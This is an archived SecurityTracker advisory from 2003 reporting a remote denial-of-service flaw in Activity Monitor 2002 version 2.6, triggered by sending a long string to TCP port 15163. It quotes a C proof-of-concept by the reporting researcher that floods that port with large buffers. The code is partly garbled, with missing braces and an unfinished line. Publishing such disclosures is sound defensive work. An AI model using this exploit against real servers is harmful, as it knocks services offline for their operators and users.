Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   Activity Monitor Vendors:
Activity Monitor 2002 Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006883
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 30 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Activity Monitor 2002, version 2.6
Description:   A denial of service vulnerability was reported in Activity Monitor 2002. A remote user can cause the application to consume CPU resources or crash.

It is reported that a remote user can connect to the application via TCP port 15163 and send a long string to cause the application to consume excessive CPU resources on the target server or crash.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can cause the application to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Activity Monitor 2002 remote Denial of Service

Overview: "Activity Monitor 2002 is a monitoring software system for real 
time employee
          monitoring and continuous tracking of users activities on 
networked computers."
	  More information can be found at

Vulnerability Description: By connecting TCP port 15163 and sending a long 
string, a remote
			   attacker could cause the application to crash 
and exhaust CPU

Affected Software: Activity Monitor 2002 ver. 2.6


#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>

int main(int argc, char **argv)

  int i,ck,port,sd;
  char dos[10000];

  struct sockaddr_in act_mon_server;

  if(argc < 2)
    printf("\nUsage: %s <ip>\n", argv[0]);
  port = 15163;
  for(i = 0; i < 10000; i++) dos[i] = 'x';
  act_mon_server.sin_family = AF_INET;
  act_mon_server.sin_port = htons((u_short)port);
  act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);
  sd = socket(AF_INET, SOCK_STREAM, 0);
  ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
  if(ck != 0) { 
  printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
  printf("\t\tby Luca Ercoli\n\n");

  write(sd, dos, sizeof(dos)); 
  write(sd, dos, sizeof(dos));
  write(sd, dos, sizeof(dos));
  printf("\nDoS sent!\n");



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC